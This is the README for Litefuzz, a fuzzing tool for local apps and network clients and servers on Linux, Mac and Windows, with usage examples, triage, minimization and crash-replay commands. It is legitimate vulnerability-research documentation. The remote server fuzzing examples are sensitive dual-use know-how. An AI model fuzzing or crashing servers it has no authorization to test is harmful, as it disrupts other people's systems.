Yes, another fuzzer and one that doesn't track all that well with the current trends and conventions. Trade-offs were made to address certain requirements. These requirements being a fuzzer that works by default on multiple platforms, fuzzes both local and network targets and is very easy to use. Not trying to convince anybody of anything, but let's provide some context. Some targets require a lot of effort to integrate fuzzers such as AFL into the build chain. This is not a problem as this fuzzer does not require instrumentation, sacraficing the precise coverage gained by instrumentation for ease and portability. AFL also doesn't support network fuzzing out of the box, and while there are projects based on it that do, they are far from straightforward to use and usually require more code modifications and harnesses to work (similar story with Libfuzzer). It doesn't do parallel fuzzing, nor support anything like the blazing speed improvments that persistent mode can provide, so it cannot scale anywhere close to what fuzzers with such capabilities. Again, this is not a state-of-the-art fuzzer. But it doesn't require source code, properly up a build or certain OS features. It can even fuzz some network client GUIs and interactive apps. It lives off the land in a lot of ways and many of the features such as mutators and minimization were just written from scratch.

It was designed to "just work" and effort has been put into automating the setup and installation for the few dependencies it needs. This fuzzer was written to serve a purpose, to provide value in a lot of different target scenarios and environments and most importantly and for what all fuzzers should ultimately be judged on: the ability to find bugs. And it does find bugs. It doesn't presume there is target source code, so it can cover closed source software fairly well. It can run as part of automation with little modification, but is geared towards being fun to use for vulnerability researchers. It is however more helpful to think of it as a R&D project rather than a fully-fledged product. Also, there's no complicated setup w here it's slightly broken out of the box or needs more work to get it running on modern operating systems. It's been tested working on Ubuntu Linux 20.04, Mac OS 11 and Windows 10 and comes with fully functional scripts that do just about everything for you in order to setup a ready-to-fuzz environment.

Once the setup script completes, it only takes a few minutes to get started fuzzing a ton of different targets.

how it works

Litefuzz supports three different modes: local, client and server. Local means targeting local binaries, which on Linux/Mac are launched via subprocess with automatic GDB and LLDB triage support respectively on crashes and via WinAppDbg on Windows. Crashes are written to a local crash directory and sorted by fault type, such as read/write AVs or SIGABRT/SIGSEGV along with the file hashes. All unique crashes are triaged as it fuzzes and this data along with target output (as available) is also captured and placed as artifacts in the same directory. It's also possible to replay crashes with --replay and providing the crashing file. In local client mode, the input directory should contain a server greeting, response or otherwise data that a client would expect when connecting to a server. As of now only one "shot" is implementated for network fuz zing with no complex session support. The client is launched via command line and debugged the same as when file fuzzing. A listener is setup to support this scenario, yes its a slow and borderline manual labor but it works. If a crash is detected, it is replayed in gdb to get the triage details. In remote client mode, this works the same expect for no local debugging / crash triage. In local server mode, it's similar to local client mode and for remote server mode it just connects to a specified target and send mutated sample client data that the user specifies as inputs, but only a simple "can we still connect, if not then it probably crashed on the last one" triage is provided.

There are a few mutation functions written from scratch which mostly do random mutations with a random selection of inputs specified by the -i flag. For file fuzzing, just select local mode and pass it the target command line with FUZZ denoting where the app expects the filename to parse, eg. tcpdump -r FUZZ along with an input directory of "good files" to mutate. For network client fuzzing, it's similar to local fuzzing, but also provide connection specifics via -a. And if you want to fuzz servers, do server mode and provide a protocol://address:port just like for clients.

It fuzzes as fast as the target can consume the data and exit, such as the case for most CLI applications or for as long as you've determined it needs before the local execution or network connection times out, which can be much slower. No fancy exec or kernel tricks here. But of course if you write a harness that parses input and exits quickly, covering a specific part of the target, that helps too. But at that point, if you can get that close to the target, you're probably better off using persistant mode or similar features that other fuzzers can offer.

In short...

what it does

  • runs on linux, windows and mac and supports py2/py3
  • fuzzes CLI/GUI binaries that read from files/stdin
  • fuzzes network clients and servers, open source or proprietary, available to debug locally or remote
  • diffs, minimization, replay, sorting and auto-triaging of crashes
  • misc stuff like TLS support, golang binary fuzzing and some extras for Mac
  • mutates input with various built-in mutators + pyradamsa (Linux)

what it doesn't do

  • native instrumentation
  • scale with concurrent jobs
  • complex session fuzzing
  • remote client and server monitoring (only basic checks eg. connect)

support

Primarily tested on Ubuntu Linux 20.04 (lightly tested on 21.04), Windows 10 and Mac OS 11. The fuzzer and setup scripts may work on slightly older or newer versions of these operating systems as well, but the majority of research, testing and development occurred in these environments. Python3 is supported and an effort was made to make the code compatiable with Python2 as well as it's necessary for fuzzing on Windows via WinAppDbg. Platform testing primarily occured on Intel-based hardware, but things seem to mostly work on Apple's M1 platform too (notable exceptions being on Linux the exploitable plugin for GDB probably isn't supported, nor is Pyradamsa). There are also setup scripts in setup/ to automate most or all of the tasks and depencency installation. It can generally fuzz native binaries on each platform, wh ich are often compiled in C/C++, but it also catch crashes for Golang binaries as well (experimental).

python versions

Python3 is supported for Linux and Mac while Python2 is required for Windows.

Why Py3 for Linux and Mac? Pyautogui, Pyradamsa (Linux only), better socket support on Mac.

Why Py2 for Windows? Winappdbg requires Py2.

linux

GDB for debugging and exploitable for crash triage. If it's OSS, you can build and instrument the target with sanitizers and such, otherwise there's some memory debuggers we can just load at runtime.

This installation along with the python dependencies and other helpful stuff has been automated with setup/linux.sh. Recommended OS is Ubuntu 20.04 as that is where the majority of testing occurred.

mac

Instead of gdb, we use lldb for debugging on OS X as it's included with the XCode command line tools. Being an admin or in the developer group should let you use lldb, but this behavior may differ across environments and versions and you may need to run it with sudo privileges if all else fails.

The one thing you'll manually need to do is turn off SIP (in recovery, via cmd+R or use vmware fusion hacks). Otherwise, auto-triage will fail when fuzzing on Tim Apple's OS.

Almost all of the setup has been automated with the setup/mac.sh script, so you can just run it for a quick start.

windows

WinAppDbg is used for debugging on Windows with the slight caveat that stdin fuzzing isn't supported.

Like the automated setups for the other operating systems, chocolatey helps to automate package installation on windows. Run setup/windows.bat in the litefuzz root directory as Administrator to automate the installations. It will install debugging tools and other dependencies to make things run smoothly.

targets

This is a list of the types of targets that have been tested and are generally supported.

  • Local CLI/GUI apps that parse file formats or stdin

    • debug support
  • Local CLI/GUI network client that parses server responses

    • debug support for CLIs
    • limited debug support for GUIs
  • Local CLI network server that parses client requests

    • debug support (caveat: must able to run as a standalone executable, otherwise can be treated as remote)
  • Local GUI network server that parses client requests

    • theoretically supported, untested
  • Remote CLI/GUI network client that parses server responses

    • no debug support
  • Remote CLI/GUI network server that parses client requests

    • no debug support
    • exception being on Mac and using attach or reportcrash features

Again, the fuzzer can run on and support local apps, clients and servers on Linux, Mac and Windows and of course can fuzz remote stuff independent of the target platform.

triage

  • Local CLI/GUI apps that parse file formats or stdin

    • run app, catch signals, repro by running it again inside a debugger with the crasher
  • Local CLI/GUI network client that parses server responses

    • run app, catch signals, repro by running it again inside a debugger with the crasher
  • Local GUI/CLI network server that parses client requests

    • run app in debugger, catch signals, repro by running it again inside a debugger with the crasher
  • Remote CLI/GUI network client that parses server responses

    • no visiblity, collect crashes from the remote side
    • can manually write supporting scripts to aid in triage
  • Remote CLI/GUI network server that parses client requests

    • no visiblity, collect crashes from the remote side
    • can manually write supporting scripts to aid in triage
    • exception on Mac are the attach and reportcrash options, which can be used to enable some triage capabilities

getting started

Most of the setup across platforms has been automated with the scripts in the setup directory. Simply run those from the litefuzz root and it should save you a lot of time and help enable some of what's needed for automated deployments. It's useful to use a VM to setup a clean OS and fuzzing environment as among other things its snapshot capabilities come in handy.

See INSTALL.md for details.

tests

unit tests

There are a few simple unit and functional tests to get some coverage for Litefuzz, but it is not meant to be complete.

py2> pytest
py3> python3 -m pytest

This will run pytest for test_litefuzz.py in the main directory and provide PASS/FAIL results once the test run is finished.

crashing app tests

A few examples of buggy apps for testing crash and triage capabilities on the different platforms can be found in the test folder.

  • (a) null pointer dereference
  • (b) divide-by-zero
  • (c) heap overflow
  • (d-gui) format string bug in a GUI
  • (e) buffer overflow in client
  • (f) buffer overflow in server

They are automatically built during setup and you can run them on the command line, in a debugger or use them to test as fuzzing targets. If running on Windows command line, check Event Viewer -> Windows Logs -> Application to see crashes.

options

There are a ton of different options and features to take advantage of various target scenarios. The following is a brief explanation and some examples to help understand how to use them.

crash directory

-o lets you specify a crash directory other than the default, which is the crashes/ in the local path. One can use this to manage crash folders for several concurrent fuzzing runs for different apps at the same time.

insulate mode

-u insulates the target application from the normal fuzzing process, eg. execs or sending packets over and over and checking for crashes. Instead, this mode was made for interactive client applications, eg. Postman where you can script inside the application to repeat connections for client fuzzing. The target is ran inside of a debugger, the fuzzer is paused to get the user time to click a few buttons or sets the target's config to make it run automatically, user resumes and now you are fuzzing interactive network clients.

litefuzz -lk -c "/snap/postman/140/usr/share/Postman/_Postman" -i input/http_responses -a tcp://localhost:8080 -u -n 100000 -z

Insulate mode + refresh can be used for interactive clients, eg. run FileZilla in a debugger, but keep hitting F5 to make it reconnect to the server for each new iteration. Also, fuzzing local CLI/GUI servers are only started and ran once inside a debugger to make the process a little more efficient.

--key also allows you to send keys while fuzzing interactive targets, such as fuzzing FileZilla's parsing of FTP server responses by sending "refresh connection" with F5.

litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp/filezilla -u -pp --key "F5" -n 100 -z glibc

note: insulate mode has only been tested working on Linux and is not supported on Windows.

timeout

-x secs allows you to specify a timeout. In practice, this is more like "approx how long between iterations" for CLI targets and an actual timeout for GUIs.

mutators

--mutator N specifies which mutator to use for fuzzing. If the option is not provided, a random choice from the list of available mutators is chosen for each fuzzing iteration. These mutators were written from scratch (with the exception of Radamsa of course). And while they have been extensively tested and have held up pretty well during millions of iterations, they may have subtle bugs from time to time, but generally this should not affect functionality.

FLIP_MUTATOR = 1
HIGHLOW_MUTATOR = 2
INSERT_MUTATOR = 3
REMOVE_MUTATOR = 4
CARVE_MUTATOR = 5
OVERWRITE_MUTATOR = 6
RADAMSA_MUTATOR = 7

note: Radamsa mutator is only available on Linux (+ Py3).

ReportCrash

--reportcrash is mac-specific. Instead of using the default triage system, it instructs the fuzzer to monitor the ReportCrash directory for crash logs for the target process. ReportCrash must be enabled on OS X (default enabled, but usually disabled for normal fuzzing). This feature is useful in scenarios where we can't run the target in a debugger to generate and triage our own crash logs, but we can utilize this core functionality on the operating system to gain visibility.

note: consider this feature experimental as we're relying on a few moving parts and components we don't directly control within the core MacOS system. ReportCrash may eventually stop working properly and responding after fuzzing for a while even after attempting to unload and reload it, so one can try rebooting the machine or resetting the snapshot to get it back in good shape.

sudo launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist

pause

Hit ctrl+c to pause the fuzzing process. If you want to resume, choose y or n to stop. This feature works ok across platforms, but may be less reliable when fuzzing GUI apps.

reusing crashes for variant finding

-e enables reuse mode. This means that if any crashes were found during the fuzzing run, they will be used as inputs for a second round of fuzzing which can help shake out even more bugs. Combine with -z for -ez bugs! Da-duph.

The following example is fuzzing antiword with 100000 iterations and then start another run with the same iteration count and options to reuse the crashes as input to try and grind out even more bugs.

litefuzz -l -c "antiword FUZZ" -i docs -n 100000 -ez

(or one could manually copy over crashes to an input directory to directly control the interations for the reuse run)

litefuzz -l -c "antiword FUZZ" -i docs-crashes -n 500000 -z

note: this mode is supported for local apps only.

memory debugging helpers

-z enables Electric Fence (or glib malloc debugging as fallback) on Linux, Guard Malloc on Mac and PageHeap on Windows. Also, -zz can be used to disable PageHeap after enabling it for an application. If you want to just flip it on/off without starting the fuzzer, just leave out the -i flag. During Windows setup, gsudo is installed and can be used to run elevated commands on the command line, such as turning on PageHeap for targets.

sudo litefuzz -l -c "notepad FUZZ" -i texts/files -z

sudo litefuzz -l -c "notepad FUZZ" -zz

On Linux, specific helpers can be chosen. For example, instead of just using glib malloc as a fallback, it can be selected.

litefuzz -l -c "geany FUZZ" -i texts/codes -z glibc

The default Electric Fence malloc debugger is great, but it doesn't work with all targets. You can test the target with EF and if it crashes, select the glibc helper instead.

checking live target output

If fuzzing local apps on Linux or Mac, you can cat /tmp/litefuzz/RUN_ID/fuzz.out to check what the latest stdout was from the target. RUN_ID is shown in the STATS information area when fuzzing begins. In the event that a crash occurs, stdout is also captured in the crashes directory as the .out file. Global stdout/stderr also goes to /tmp/litefuzz/out for debugging purposes as well for all fuzzing targets with the exception of insulated or local server modes which debugger output goes to /tmp/litefuzz/RUN_ID/out. Winappdbg doesn't natively support capturing stdout of targets (AFAIK), so this artifact is not available on Windows.

client and server modes

If the server can be ran locally simply by executing the binary (with or without some flags and configuration), you can pass it's command line with -c and it will be started, fuzzed and killed with a new execution every iteration. The idea here is trading speed for the ability avoid those annoying bugs which triggered only after the target's memory is in a "certain state", which can lead to false positives. Same deal with locally fuzzing network clients. It even supports TLS connections, generating certificates for you on the fly (allowing the user to provide a client cert when fuzzing a server that requires it and certificate fuzzing itself are other ideas here). Debugging support is not provided by Litefuzz when fuzzing remote clients and servers, so setup on that remote end is up to the user. For servers, we simply check if the server stopped responding and note the previous payload as the crasher. This works fine for TCP connections, but we don't quite have this luxury for UDP services, so monitoring the remote server is left up to either the ReportCrash feature (available on Mac), running the target in a debugger (via local server mode or manually) or crafting custom supporting scripts. Also, some servers may auto-restart or otherwise recover after crashing, but there may be signs of this in the logs or other artifacts on the filesystem which can parsed by supporting scripts written for a particular target.

local network examples

litefuzz -lk -c "wget http://localhost:8080" -a tcp://localhost:8080 -i input/http -z

litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -z

litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -o crashes/curl --tls -n 100000 -z

(open Wireshark and capture the response from a d, right click Simple Network Management Protocol -> Export Packet Bytes -> resp.bin)

litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3

litefuzz -ls -c "./sc_serv shoutcast.conf" -a localhost:8000 -i input/shouts -z

litefuzz -ls -c "snmpd" -i input/snmp -a udp://localhost:161 -z

quick notes

  • UDP sockets can act a little strange on Mac + Py2, so only Mac + Py3 has been tested and supported
  • Local network client fuzzing on Windows can be buggy and should be considered experimental at this time

remote network examples

Fuzzing remote clients and servers is a bit more challenging: we have no local debugging and rely on catching a halt in interaction between the two parties over the network to catch crashes. Also, since we are assumedly blind to what's happening on the other end, fuzzing ends when the client or server stops responding and needs to be restarted manually after the client or server is restored to a normal (uncrashed) state unless the user has setup scripts on the remote side to manage this process. Again, UDP complicates this further. Even sending a test packet to see if there's a listening service on a UDP port doesn't guarantee a reply. So it's possible to remotely fuzz network clients and servers, but there's a trade-off on visibility.

client

while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done

litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -pp -n 100

Client mode is more finicky here because it's hard to tell whether a client has actually crashed so it's not reconnecting or if the send/recv dance is just off as different clients can handle connections however they like. Also note that this just an example and that remote client fuzzing by nature is tricky and should be considered somewhat experimental.

server

The pros and cons of fuzzing a server locally or remotely can help you make a decision of how to approach a target when both options are available. Basically, fuzzing with the server in a debugger is going to be slower but you'll be able to get crash logs with the automatic triage, whereas fuzzing the server in remote mode (even pointing it to the localhost) will be much faster on average, but you lose the high visibility, debugger-based triage capabilities but it will give you time to manually restart the server after each crash to keep going before it exits (TCP servers only, feature does not support UDP-based servers).

Shoutcast

./sc_serv ...

litefuzz -s -a localhost:8000 -i input/shouts -n 10000

SSHesame

sshesame

litefuzz -s -a tcp://target:2022 -i input/ssh-server -p -n 1000000 -x 0.05

FTP

litefuzz -s -a tcp://target:21 -i input/ftp/req.txt -pp -n 1000

DNS

coredns -dns.port 10000

litefuzz -ls -c "coredns -dns.port 10000" -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000

or

litefuzz -s -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000

TLS

litefuzz -s -a tcp://hostname:8080 -i input/http --tls -n 10000

...
@ 48/10000 (1 crashes, 0 duplicates, ~7:13:18 remaining)

[!] check target, sleeping for 60 seconds before attempting to continue fuzzing...

note: default remote server mode delays between fuzzing iterations can make fuzzing sessions run reliably, but are pretty slow; this is the safe default, but one can use -x to set very fast timeouts between sessions (as shown above) if the target is OK parsing packets very quickly, unoffically nicknamed "2fast2furious" mode

For more on session-based protocols (such as FTP or SSH), see Multiple modes.

multiple data exchange modes

-p is for multiple binary data mode, which allows one to supply sequential inputs, eg. input/ssh directory containing files named "1", "2", "3", etc for each packet in the session to fuzz. This is meant to enable fuzzing of binary-based protocol implementations, such as SSH client.

ls input/ssh 1 2 3 4

xxd input/ssh/2 | head

00000000: 0000 041c 0a14 56ff 1297 dcf4 672d d5c9  ......V.....g-..
00000010: d0ab a781 dfcb 0000 00e6 6375 7276 6532 ..........curve2
00000020: 3535 3139 2d73 6861 3235 362c 6375 7276 5519-sha256,curv
00000030: 6532 3535 3139 2d73 6861 3235 3640 6c69 [email protected]
00000040: 6273 7368 2e6f 7267 2c65 6364 682d 7368 bssh.org,ecdh-sh
00000050: 6132 2d6e 6973 7470 3235 362c 6563 6468 a2-nistp256,ecdh
00000060: 2d73 6861 322d 6e69 7374 7033 3834 2c65 -sha2-nistp384,e
00000070: 6364 682d 7368 6132 2d6e 6973 7470 3532 cdh-sha2-nistp52
00000080: 312c 6469 6666 6965 2d68 656c 6c6d 616e 1,diffie-hellman
00000090: 2d67 726f 7570 2d65 7863 6861 6e67 652d -group-exchange-

Each packet is consumed into an array, a random index is mutated and replayed to fuzz the target.

litefuzz -lk -c "ssh -T [email protected] -p 2222" -a tcp://localhost:2222 -i input/ssh -o crashes/ssh -p -n 250000 -z glibc

And you can check on the target's output for the latest iteration.

authentication code incorrect">
cat /tmp/litefuzz/out
kex_input_kexinit: discard proposal: string is too large
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: string is too large

... and others like

ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: unknown or unsupported key type

ssh_askpass: exec(/usr/bin/ssh-askpass): No such file or directory
Host key verification failed.

Bad packet length 1869636974.
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect

-pp asks the fuzzer to check inputs for line breaks and if detected, treat those as multiple requests / responses. This is useful for simple network protocol fuzzing for mostly string-based protocol implementations, eg. ftp clients.

cat input/ftp/test
220 ProFTPD Server (Debian) [::ffff:localhost]
331 Password required for user
230 User user logged in
215 UNIX Type: L8
221 Goodbye

The fuzzer breaks each line into it's own FTP response to try and fuzz a client's handling of a session. There's no guarentee, however, that a client will "behave" or act in ways that don't allow a session to complete properly, so some trial and error + fine tuning for session test cases while running Wireshark can be helpful for understanding the differences in interaction between targets.

litefuzz -lk -c "ftp localhost 2121" -a tcp://localhost:2121 -i input/ftp -o crashes/ftp -n 100000 -pp -z

This can also be combined with -u for insulating GUI network targets like FileZilla.

litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp.resp -n 100000 -u -pp -z glibc

attaching to a process

If the target spawns a new process on connection, one can specify the name of a process (or pid) to attach to after a connection has been established to the server. This is handy in cases where eg. launchd is listening on a port and only launches the handling process once a client is connected. This is one feature that sort of blurs the line between local and remote fuzzing, as technically the fuzzer is in remote mode, yet we specify the target address as localhost and ask it to attach to a process.

./litefuzz.py -s -a tcp://localhost:8080 -i input/shareserv -p --attach ShareServ -x 1 -n 100000

note: currently this feature is only supported on Mac (LLDB) and for network fuzzing, although if implemented it should work fine for Linux (GDB) too.

crash artifacts

When a crash is encountered during fuzzing, it is replayed in a debugger to produce debug artifacts and bucketing information. The information varies from platform to platform, but generally the a text file is produced with a backtrace, register information, !exploitable type stuff (where available) and other basic information.

Memory dumps can be enabled on Windows by passing the --memdump or disabled with --nomemdump similar to how malloc debuggers are controlled via -z and -zz respectively. If enabled, the dump will also be loaded in the console debugger (cdbg) and !analyze -v crash analysis output is captured within an additional memory dump crash analysis log. Winappdbg already has !exploitable type analysis that we get in the initial crash analysis, so we just do !analyze here.

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump

or to disable memory dumps for an application

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --nomemdump

In addition to auto-crash triage, binary/string diffs (as appropriate) and target stdout (platform / target dependent) is also produced and repro files of course.

For local fuzzing, artifacts generally include diffs, stdout (linux/mac only), repro file and the crash log and information file.

$ ls crashes/latex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diff
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diffs
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.out
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.tex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.txt

On Windows, if memory dumps are enabled, a dump file will be generated and additional triage information will be written to an additional crash analysis log.

C:\litefuzz\crashes> dir
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.dmp
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.log
....

For remote fuzzing, artifacts may vary depending on the options chosen, but often include diffs, repro file and/or repro file directory (if input is a session with multiple packets), previous fuzzing iteration repro (prevent losing a bug in case its actually the crasher as remote fuzzing has its challenges) and crash log or brief information file.

ls crashes/serverd
REMOTE_SERVER_testbox.1_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_PREV_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diff
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diffs
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.txt
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.zz

ls crashes/serverd/REMOTE_SERVER_localhost_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_1.zz REMOTE_SERVER_localhost_NNNN_2.zz
REMOTE_SERVER_testbox.1_NNNN_3.zz REMOTE_SERVER_localhost_NNNN_4.zz

golang

Apparently when Golang binaries crash, they may not actually go down with a traditional SIGSEGV, even if that's what they say in the panic info (Linux tested). They may instead crash with return code 2. So I guess that's what we're going with :) I'm sure there's a better explanation out there for how this works and edge cases around it, but one can use --golang to try and catch crashes in golang binaries on Linux.

litefuzz -l -c "evernote2md FUZZ" -i input/enex -o crashes/evernote2md --golang -n 100000

repros

Crashing files are kept in the crashes/ directory (or otherwise specified by -o flag) along with diffs and crash info.

-r and passing a repro file (or directory) with the appropriate target command line / address setup will try and reproduce the crash locally or remote.

local example

litefuzz -l -c "latex2rtf FUZZ" -r crashes/latex2rtf/test.tex -z

local network example

./litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -r crashes/crash.raw

remote network example

litefuzz -s -a tcp://host:8000 -r crashes/crash.raw

remote network example (multiple packets)

litefuzz -s -a tcp://localhost:22 -r repro/dir/here

remove file

Some targets ask for a static outfile location as part of their command line and may throw an error if that file already exists. --rmfile is an option for getting around this while fuzzing where after each fuzzing iteration, it will remove the file that was generated as a part of how the target functions.

litefuzz -l -c "hdiutil makehybrid -o /tmp/test.iso -joliet -iso FUZZ" -i input/dmg --rmfile /tmp/test.iso -n 500000 -ez

minimization

Minimizing crashing files is an interesting activity. You can even infer how a target is parsing data by comparing a repro with a minimized version.

-m and passing a repro file with the target command line or address setup will attempt to generate a minimized version of the repro which still crashes the target, but smaller and without bytes that may not be necessary. During this minimization journey, it may even find new crashes. Only local modes are supported, but this still includes local client and server modes, so you can minimize network crashes as long as we can debug them locally.

For example, this request is the original repro file.

GET /admin.cgi?pass=changeme&mode=debug&option=donotcrash HTTP/1.1
Host: localhost:8000
Connection: keep-alive
Authorization: Basic YWRtaW46Y2hhbmdlbWU=
Referer: http://localhost:8000/admin.cgi?mode=debug

Now take a look at it's minimized version.

GET /admin.cgi?mode=debug&option=a
Authorization:s YWRtaW46Y2hhbmdlbWU
Referer:admin.cgi

One can make some guesses about what the target is looking for and even the root cause of the crash.

  1. The request is most important part
  2. option= can probably be a lot of different things
  3. The Host and Connection headers aren't neccesary
  4. Authorization header parsing is just looking for the second token and doesn't care if it's explicitly presenting Basic auth
  5. Referer is necessary, but only admin.cgi and not the host or URL

Anything else? Here's a bonus: passing a valid password isn't needed if the Authorization creds are correct, and visa-versa. Since the minimization is linear and starts at the beginning of the file and goes until it hits the end, we'd only produce a repro which authenticates this way, while still discovering there are actually two options!

-mm enables supermin mode. This is slower, but it will try and minimize over and over again until there's no more unnecessary bytes to remove.

For fun, we can modify the repro and run it through supermin to get the maximally minimized version.

GET /admin.cgi?pass=changeme&mode=debug&option=a
Referer:admin.cgi

minimization examples

litefuzz -l -c "latex2rtf FUZZ" -m test.tex -z

litefuzz -ls -c "./sc_serv shoutcast.conf" -a "tcp://localhost:8000" -m repro.http

supermin example

litefuzz -l -c "latex2rtf FUZZ" -mm crashes/latex2rtf/test.tex -z
...
[+] starting minimization

@ 582/582 (1 new crashes, 1145 -> 582 bytes, ~0:00:00 remaining)

[+] reduced crash @ pc=55555556c141 -> pc=55555557c57d to 582 bytes

[+] supermin activated, continuing...

@ 299/299 (1 new crashes, 582 -> 300 bytes, ~0:00:00 remaining)

[+] reduced crash @ pc=55555557c57d to 300 bytes
...
[+] reduced crash @ pc=555555562170 to 17 bytes

@ 17/17 (2 new crashes, 17 -> 17 bytes, ~0:00:00 remaining)

[+] achieved maximum minimization @ 17 bytes (test.min.tex)

[RESULTS]
completed (17) iterations with 2 new crashes found

command

--cmd allows a user to specify a command to run after each iteration. This can be used to cleanup certain operations that would otherwise take up resources on the system.

litefuzz -l -c "/System/Library/CoreServices/DiskImageMounter.app/Contents/MacOS/DiskImageMounter FUZZ" -i input/dmg --cmd "umount /Volumes/test.dir" --click -x 5 -n 100000 -ez

examples

local app

quick look

litefuzz -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -x 1 -n 100
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 4
iterations: 100
mutator: random(mutators)

@ 100/100 (1 crashes, 4 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (100) iterations with (1) unique crashes and 4 dups
>> check crashes/latex2rtf dir for more details

enumerating file handlers on Ubuntu

$ cat /usr/share/applications/defaults.list
[Default Applications]
application/csv=libreoffice-calc.desktop
application/excel=libreoffice-calc.desktop
application/msexcel=libreoffice-calc.desktop
application/msword=libreoffice-writer.desktop
application/ogg=rhythmbox.desktop
application/oxps=org.gnome.Evince.desktop
application/postscript=org.gnome.Evince.desktop
....

fuzz the local tcpdump's pcap parsing (Linux)

litefuzz -l -c "tcpdump -r FUZZ" -i test-pcaps

fuzz Evice document reader (Linux GUI)

litefuzz -l -c "evince FUZZ" -i input/oxps -x 1 -n 10000

fuzz antiword (oldie but good test app :) (Linux)

litefuzz -l -c "antiword FUZZ" -i input/doc -ez

note: you can (and probably should) pass -z to enable Electric Fence (or fallback to glibc's feature) for heap error checking

enumerating file handlers on OS X

swda can enumerate file handlers on Mac.

$ ./swda getUTIs | grep -Ev "No application set"
com.adobe.encapsulated-postscript /System/Applications/Preview.app
com.adobe.flash.video /System/Applications/QuickTime Player.app
com.adobe.pdf /System/Applications/Preview.app
com.adobe.photoshop-image /System/Applications/Preview.app
....

fuzz gpg decryption via stdin with heap error checking (Mac)

litefuzz -l -c "gpg --decrypt" -i test-gpg -o crashes-gpg -z

fuzz Books app (Mac GUI)

litefuzz -l -c "/System/Applications/Books.app/Contents/MacOS/Books FUZZ" -i test-epub -t "/Users/test/Library/Containers/com.apple.iBooksX/Data" -x 8 -n 100000 -z

note: -z here enables Guard Malloc heap error checking in order to detect subtle heap corruption bugs

mac note

Some GUI targets may fail to be killed after each iteration's timeout and become unresponsive. To mitigate this, you can run a script that looks like this in another terminal to just periodically kill them in batch to reduce manual effort and monitoring, else the fuzzing process may be affected.

#!/bin/bash
ps -Af | grep -ie "$1" | awk '{print $2}' | xargs kill -9
$ while :; do ./pkill.sh "Process Name /Users/test"; sleep 360; done

/Users/test (example for the first part of the path where temp files are being passed to the local GUI app, FUZZ becomes a path during execution) was chosen as you need a unique string to kill for processes, and if you only use the Process Name, it will kill the fuzzing process as it contains the Process Name too.

enumerating file handlers on Windows

Using the AssocQueryString script with the assoc command can map file extensions to default applications.

C:\> .\AssocQueryString.ps1
...
.hlp :: C:\Windows\winhlp32.exe
.hta :: C:\Windows\SysWOW64\mshta.exe
.htm :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.html :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.icc :: C:\Windows\system32\colorcpl.exe
.icm :: C:\Windows\system32\colorcpl.exe
.imesx :: C:\Windows\system32\IME\SHARED\imesearch.exe
.img :: C:\Windows\Explorer.exe
.inf :: C:\Windows\system32\NOTEPAD.EXE
.ini :: C:\Windows\system32\NOTEPAD.EXE
.iso :: C:\Windows\Explorer.exe

When fuzzing on Windows, you may want to enable PageHeap and Memory Dumps for a better fuzzing experience (unless your target doesn't like them) prior to starting a new fuzzing run.

